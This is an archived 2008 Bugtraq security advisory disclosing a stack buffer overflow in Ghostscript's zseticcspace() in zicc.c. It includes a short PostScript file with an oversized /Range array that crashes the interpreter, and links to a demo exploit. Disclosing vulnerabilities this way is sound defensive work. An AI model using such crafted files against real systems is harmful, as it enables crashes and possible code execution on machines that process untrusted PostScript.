Ghostscript buffer overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ghostscript buffer overflow
From: "Chris Evans" <scarybeasts@xxxxxxxxx>
Date: Thu, 28 Feb 2008 14:57:42 -0800
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=MCnoVL1px4iU6uI8nbPAgbzBCmOo19N3pQa8IQ1F3No=; b=EjdP5frT31gY5p15dBQhJVukgQynHFNC0wWF9GnO0gr2ojuT/hEjwb2R1sj8R3cqE44xOnvNVv/V+2dFR7BE1eAJT5DHc8o4JYfNnjHnoQszCOXQM7yQI7WD7iZJAvtLaKsMS3HePmQ3mvbxSzboCMerMo+nz+G0Ob/I7ffzjNc=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=gDt2tYzPV/js/mcrXK5Vn/DyBaw4zENobyyjX7yjAqhMqWiornilpT1s0d9tqbshBDPwHj9yYti9GOAwi7MhJu6ZxIesWTJyC6jJ98RGyMdwI4ieNnLHNGmAjga67O/VWiSQHlKWSQU17Bp5kUioWeaxVX7rAccj7DSMsx/iv48=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi,

Buffer overflow in Ghostscript. A useful attack vector because a lot
of UNIX workstations will put PS files on the web through Ghostscript.

The problem is a stack-based buffer overflow in the zseticcspace()
function in zicc.c. The issue is over-trust of the length of a
postscript array which an attacker can set to an arbitrary length. One
slight amusement is that the overflowed type is "float", leading to
machine code -> float conversion in any exploit. An example .ps file
to trigger a crash follows:

%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace

Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html

Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html

Cheers
Chris

Prev by Date: PHPMyTourney Remote file include Vulnerability
Next by Date: Re: Loginwindow.app and Mac OS X
Previous by thread: PHPMyTourney Remote file include Vulnerability
Next by thread: Centreon <= 1.4.2.3 (index.php) Remote File Disclosure
Index(es):
- Date
- Thread